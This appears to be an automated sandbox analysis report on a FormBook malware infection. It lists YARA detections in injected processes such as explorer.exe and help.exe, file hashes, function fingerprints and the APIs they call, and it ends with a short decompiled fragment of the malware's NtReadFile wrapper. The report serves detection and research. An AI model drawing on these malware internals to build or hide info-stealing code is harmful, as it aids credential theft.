Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3292 Parent PID: 6824

General

Start time:	12:56:11
Start date:	09/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff662bf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: help.exe PID: 6756 Parent PID: 3292

General

Start time:	12:56:45
Start date:	09/11/2021
Path:	C:\Windows\SysWOW64\help.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\help.exe
Imagebase:	0x120000
File size:	10240 bytes
MD5 hash:	09A715036F14D3632AD03B52D1DA6BFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 6420 Parent PID: 1596 vbc.exeCOMMON

Executed Functions

Function 04FCDD66, Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.265568102.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee61bda6f1a24fbae2a575a9f07a4d4e07e310436e859f323d7fd3044b2dfef
Instruction ID: afb53785288264999a52a5fcdaddd4b80779c17607e9fe0dd49beadb2e734dc2
Opcode Fuzzy Hash: cee61bda6f1a24fbae2a575a9f07a4d4e07e310436e859f323d7fd3044b2dfef
Instruction Fuzzy Hash: 45D18135E116168FDB14CFB9D8816AEBBF2BFC8304F15C568E405EB359DB34A9428B90

Uniqueness

Uniqueness Score: -1.00%

Function 04FCD9C0, Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.265568102.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44b9c0c13c2cb59b5c27fad871a9b13853acc277769e51fc87d8f8952939f28
Instruction ID: 4a74ef34139ceac3d9adf9e1d5ecd17264d3c47293dee6801de73cb3aa50cb99
Opcode Fuzzy Hash: c44b9c0c13c2cb59b5c27fad871a9b13853acc277769e51fc87d8f8952939f28
Instruction Fuzzy Hash: 8D7107B9E4011F9FDF14CFA9D584AADBBB1FB48300F10A669D402EB2A4DB31A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04FC4F49, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.265568102.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f9f0ade723fb0f85670353102e17a36714f4d15ae564824fd544ed0751abdb
Instruction ID: ff7ddf3cbd7cb96d7c5d0ca9955b9d51f7b3d68b8453dff16139b4c3b77db448
Opcode Fuzzy Hash: 01f9f0ade723fb0f85670353102e17a36714f4d15ae564824fd544ed0751abdb
Instruction Fuzzy Hash: 32511774E01229CFDB24CF65DA44BDEBBB2EB89301F4095AAC40DA7250DB346E86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02959B90, Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02959DD6

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fd7bb007af3980c2223f1a3f771a77cf057572ecc977691f200cd6f8292e7bbe
Instruction ID: 5edea68565cd7ecb86a513959261e4dcdb7a3d59908675e34834f83bc25af352
Opcode Fuzzy Hash: fd7bb007af3980c2223f1a3f771a77cf057572ecc977691f200cd6f8292e7bbe
Instruction Fuzzy Hash: EB711570A00B15CFEB24DF6AD15079ABBF5FF88204F008929D88ADBA50DB75E945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02955565, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02955621

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f5b9f327d001de3a0bee6bf50e5009e81cee7d2d0def12c21cb1444206cc0570
Instruction ID: 9e214aa7c7cb7b7ca72e502ee9dd38951fae61be853df732eb7b552458e36d80
Opcode Fuzzy Hash: f5b9f327d001de3a0bee6bf50e5009e81cee7d2d0def12c21cb1444206cc0570
Instruction Fuzzy Hash: E44114B0D00618CFDB24CFA9C8847DEBBF5BF48308F208469D808AB251DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04FC0284, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04FC2BD1

Memory Dump Source

Source File: 00000000.00000002.265568102.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 9ca6793b975d52da3aebe94916f9b29187ec725d7ec43bdb6983a2b64eceafd9
Instruction ID: 3beb7e4b8cbbcef15fd7c42b1cdbb9b666de68c525eff774d93be23fc2722292
Opcode Fuzzy Hash: 9ca6793b975d52da3aebe94916f9b29187ec725d7ec43bdb6983a2b64eceafd9
Instruction Fuzzy Hash: 59412CB8E00205CFDB14CF99C588AAABBF5FB88314F15C499D5196B321D774A846CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02953E30, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02955621

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e5f43e81cc2d55293a6a808943d49ffbf9ff77b7ee99dbad1332fcbdf60659c9
Instruction ID: 53d8b4fea6cefea54b519f0d2936abed1c7666bb1ff9a9503c8e938f284a41df
Opcode Fuzzy Hash: e5f43e81cc2d55293a6a808943d49ffbf9ff77b7ee99dbad1332fcbdf60659c9
Instruction Fuzzy Hash: 6441E2B0D00658CFDB24DFA9C844BDEBBF5BF49308F508469D808AB251DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0295C0B1, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0295C07E,?,?,?,?,?), ref: 0295C13F

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 431d60df4e23f9fd37f93ca4974a7dd7dd642a9874d380fdf41c9883f03e2fbc
Instruction ID: 74191fab9d0565520efe33dc6ea241207b236ed23c2dba467804444e515a6038
Opcode Fuzzy Hash: 431d60df4e23f9fd37f93ca4974a7dd7dd642a9874d380fdf41c9883f03e2fbc
Instruction Fuzzy Hash: 7021E4B5D002089FDB10CFA9D984ADEBBF8FB58324F14841AE954A7310D378A945DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0295BBC4, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0295C07E,?,?,?,?,?), ref: 0295C13F

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: daca6cda84adf9df1d6106cda18325e594e36db7b1da488f032d7ebcb02f1dd4
Instruction ID: 2a997c0dee26330bfb0e9554771c7f945067c4025c6057db276af0370bc3deb4
Opcode Fuzzy Hash: daca6cda84adf9df1d6106cda18325e594e36db7b1da488f032d7ebcb02f1dd4
Instruction Fuzzy Hash: 9A21E4B5900318AFDB10CFA9D984AEEBBF8FB48324F14845AE914B7310D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02959850, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02959E51,00000800,00000000,00000000), ref: 0295A062

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 01ba8e1f974130b587593ef3f0836ec7ad70303101a97c614e98f5d5d07684ba
Instruction ID: 375f11e9e909301b870ee14680305ba13397db4c943deef0980f9c37c60c8486
Opcode Fuzzy Hash: 01ba8e1f974130b587593ef3f0836ec7ad70303101a97c614e98f5d5d07684ba
Instruction Fuzzy Hash: 121117B59003199FDB10CFAAD444BDEFBF8EB49314F14852AD915B7200C379A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02959FF0, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02959E51,00000800,00000000,00000000), ref: 0295A062

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ed62772994782662e5fbbe21b723b651544a1b8b6df125e689b4193d94b3ab92
Instruction ID: d2fa5c37491be9941c1fbad1847c718e80ee91e4ddb9788a8a140008ba88f33b
Opcode Fuzzy Hash: ed62772994782662e5fbbe21b723b651544a1b8b6df125e689b4193d94b3ab92
Instruction Fuzzy Hash: 431117B69002488FCB10CFAAD544ADEFBF4EB49314F14852AD919A7200C379A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02959D70, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02959DD6

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e885e09ad8fbe49c0bcf59e8ac64ac2481e039437e705b342bcf08392c7a4b40
Instruction ID: 6fe12fa12e00400fc31a6809db1f1cb476a6f523b4b439e11a23bff7bfcb4ec4
Opcode Fuzzy Hash: e885e09ad8fbe49c0bcf59e8ac64ac2481e039437e705b342bcf08392c7a4b40
Instruction Fuzzy Hash: 55110FB5D002098FDB10CF9AD444BDEFBF8AF88224F14842AD829B7200C378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263933258.0000000000D0D000.00000040.00000001.sdmp, Offset: 00D0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4a0f10c9fe6ff1a15a2db2f4aa1aaba751485bc311e89ff8f98039e94b6e29
Instruction ID: 3957b7187e6233ca1d8277068ecfb9575ebc9a5f5381eb148cd7e49df2411614
Opcode Fuzzy Hash: 8e4a0f10c9fe6ff1a15a2db2f4aa1aaba751485bc311e89ff8f98039e94b6e29
Instruction Fuzzy Hash: BD212875500244DFDB00CF94D9C0F26BB66FB94324F24C56AE90D0B286C336E856DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D1D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263945541.0000000000D1D000.00000040.00000001.sdmp, Offset: 00D1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ecd723291f129d118f5dc8d81020b2f2cd0c1d7595a66f67aaa6a432941eac8
Instruction ID: 1ae40f3c4cc011df2dc42c7548a2e60f85b5bac307c6ff5bd20226a60268cd7e
Opcode Fuzzy Hash: 3ecd723291f129d118f5dc8d81020b2f2cd0c1d7595a66f67aaa6a432941eac8
Instruction Fuzzy Hash: 3A21F575604244FFDB01CF54E5C0F66BBA6FB84314F34CA69D8494B245CB36D886CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00D1D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263945541.0000000000D1D000.00000040.00000001.sdmp, Offset: 00D1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56451d8549ef166b2a613fe6c89d53d1e7001449cc0b9384e749a365e8aa7823
Instruction ID: c3b9204432ec5bfd8d08afa656d602a4929dc6bd97bcdab5055c344bdd462957
Opcode Fuzzy Hash: 56451d8549ef166b2a613fe6c89d53d1e7001449cc0b9384e749a365e8aa7823
Instruction Fuzzy Hash: 4721F575504244EFDB14CF14E9C4B66BB66FB88314F24C969E8494B346CB36D886CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D1D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263945541.0000000000D1D000.00000040.00000001.sdmp, Offset: 00D1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67401a6d06adbd776b6f08c7bb32aa4908e9a7cf848b3da194d3b9ea0a603829
Instruction ID: 91be5ba16570a13f98abf4fe5d636c4abdd5abd6601f897c5e6f1131548bdbbf
Opcode Fuzzy Hash: 67401a6d06adbd776b6f08c7bb32aa4908e9a7cf848b3da194d3b9ea0a603829
Instruction Fuzzy Hash: 382192755093C09FCB02CF24D990B55BF71EB4A314F28C5EAD8498F697C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263933258.0000000000D0D000.00000040.00000001.sdmp, Offset: 00D0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e6f7ffd02ba2a82b166b3eeb6ba4046df9914ebf0051f0c98ccf2b40a19682d
Instruction ID: af4bc61f0694499f21f00ce4ee4610d003311fef4a8711169c510da8999d7901
Opcode Fuzzy Hash: 0e6f7ffd02ba2a82b166b3eeb6ba4046df9914ebf0051f0c98ccf2b40a19682d
Instruction Fuzzy Hash: D511D376404280DFCB11CF54D5C4B16BF72FB94324F28C6AAD8090B656C33AE85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D1D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263945541.0000000000D1D000.00000040.00000001.sdmp, Offset: 00D1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78bca70b3e9f58e795f9b530d0095e2f241f19884c38e31f49b3587a4c04f99
Instruction ID: d51b0299629d186d5c118869a0f844668984e0ad6dae9b6cda8750f139750bad
Opcode Fuzzy Hash: a78bca70b3e9f58e795f9b530d0095e2f241f19884c38e31f49b3587a4c04f99
Instruction Fuzzy Hash: 01118B75504280EFCB11CF14D5C4B55BBA2FB84324F28C6A9D8494B656C33AD89ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D731, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263933258.0000000000D0D000.00000040.00000001.sdmp, Offset: 00D0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 125d4dd33434bc4595dc12e3bdd2a7ee1c9b01ef38cfbdced731bf3ed908729c
Instruction ID: d2ba50bdf540674669ca7d7fefaa0b0c271f7922289d78f94e7ea4956222a9b0
Opcode Fuzzy Hash: 125d4dd33434bc4595dc12e3bdd2a7ee1c9b01ef38cfbdced731bf3ed908729c
Instruction Fuzzy Hash: 7901A7754043449AE7108EA5CDC4BA7FBDDEFC1364F2C885BED4A5B282D3B89884D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D730, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263933258.0000000000D0D000.00000040.00000001.sdmp, Offset: 00D0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71083df242ae756b1cb1b549d397439395ee2363804109387e298c06392acc80
Instruction ID: f5a67222133b065fa65b138cdf659031a50e20b644b253166fc2317ac96c305b
Opcode Fuzzy Hash: 71083df242ae756b1cb1b549d397439395ee2363804109387e298c06392acc80
Instruction Fuzzy Hash: C2F04F714052449EE7108A56DD84BA2FB98EB91734F18C55AED095F282C2799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04FCF0C2, Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

, xrefs: 04FCF1EE

Memory Dump Source

Source File: 00000000.00000002.265568102.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5c85b307d42efb973ae139bfe4419e763e25360af900f134562f3f0098feebf5
Instruction ID: 37454e87913eac30fa8242b3e89e3f24a08032c6623e2e10613afc85fe7621dc
Opcode Fuzzy Hash: 5c85b307d42efb973ae139bfe4419e763e25360af900f134562f3f0098feebf5
Instruction Fuzzy Hash: 4A51DF75F001058FCB14CFA8E9816AEB7B2EF88215B15887AE505DB759DB30EC428B91

Uniqueness

Uniqueness Score: -1.00%

Function 0295E970, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7ee814c0742d98d1bcbcf33cea271985ff0e507f17d609b5dac0d7c10d2903
Instruction ID: 1ed84bdfed9bf3e97d39ea83b9976086582498e6debf989930db0a9c909ca7e5
Opcode Fuzzy Hash: bb7ee814c0742d98d1bcbcf33cea271985ff0e507f17d609b5dac0d7c10d2903
Instruction Fuzzy Hash: 6912E4F5C997468BE310CF65EDC81A93BA0B744328FDB4A08D2616BAD0D7B9056ECF44

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9C98, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.265568102.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed4d10c18dbdaf55c8aa73c55e52b9ac1ae8e7e70083ad4c5b72a421e9fd136
Instruction ID: 379076e1170b8159a214b3f9ca32722898a1733729cc06b6f73ca9791b9d134f
Opcode Fuzzy Hash: 9ed4d10c18dbdaf55c8aa73c55e52b9ac1ae8e7e70083ad4c5b72a421e9fd136
Instruction Fuzzy Hash: 97D10A31C20B5A8ACB01EFA4D9906EDB775FF95300F509B9AE50937264EB706AC5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0295CF94, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f31fb04f4f1ce720520669220d7b1d65262d52effe6bfed9d587a2465b3508cf
Instruction ID: 952e375dde135d8591cbea82c21390795346d692ec786ec5a4bd63765becee13
Opcode Fuzzy Hash: f31fb04f4f1ce720520669220d7b1d65262d52effe6bfed9d587a2465b3508cf
Instruction Fuzzy Hash: 13A14D32F002298FCF05DFB5C8445EEBBB6FF85304B15856AE905AB224DB36AA55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9CA8, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.265568102.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7238af0b0a3f8e4e5d2ccb4dda7d2ec42def884f267e1939e9aebbd00bb925b4
Instruction ID: c692d80710530e7711f726f371196c2c8c957e58d2631b8020744c58fba5df65
Opcode Fuzzy Hash: 7238af0b0a3f8e4e5d2ccb4dda7d2ec42def884f267e1939e9aebbd00bb925b4
Instruction Fuzzy Hash: 88D1FB31C20B5A8ACB01EFA4D9906EDB775FF95300F509B9AE50937264EB706AC5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04FCEDB0, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.265568102.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c285d0d34ddfe5641a37c4b4498264d6403fb261e147da59e68d0cbe2a8e7f
Instruction ID: 88370ea0d6174e0ed76982bdb556528ac0c97f911f8b8106073a9b7be8f34482
Opcode Fuzzy Hash: 05c285d0d34ddfe5641a37c4b4498264d6403fb261e147da59e68d0cbe2a8e7f
Instruction Fuzzy Hash: 6E815E32F105258FD714DB69DC84A9EB7E3AFC8714F1A8468E509EB395DB31AC428B90

Uniqueness

Uniqueness Score: -1.00%

Function 0295E96C, Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264218923.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a01b6eb137bb2e2690817d4f626e7a207d833f0f16946ac1b16ff8a01bb7a26b
Instruction ID: 2e6b37e0fdfa0d8f001225a1ace32b11e46f57335b19d85339d757de4c255fb2
Opcode Fuzzy Hash: a01b6eb137bb2e2690817d4f626e7a207d833f0f16946ac1b16ff8a01bb7a26b
Instruction Fuzzy Hash: 80C128B1C997468BD710DF65ECC81A93BA1BB84328FDB4A08D2616B6D0D7B414AECF44

Uniqueness

Uniqueness Score: -1.00%

Function 04FCEE51, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.265568102.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6fe59d4e04204975db1b55375d58ce8a9dfa386493f979242616e75cf31b844
Instruction ID: 6ba833d846d7e017246a54679bd7d1ceaf1b7f811d0b76cb3ccab1a4d38c9fa0
Opcode Fuzzy Hash: b6fe59d4e04204975db1b55375d58ce8a9dfa386493f979242616e75cf31b844
Instruction Fuzzy Hash: 39616F32F101258FD714DB69CC80B5EB3E3AFC4714F1AC468E4059B799DB31AC428B90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 6824 Parent PID: 6420 vbc.exeCOMMON

Executed Functions

Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418693
0x0041869f
0x004186a7
0x004186ac
0x004186b2
0x004186cd
0x004186d5
0x004186d9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

r=A, xrefs: 004186B2, 004186C0
1:A, xrefs: 004186AC, 004186B8
r=A, xrefs: 004186CD, 004186D4

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
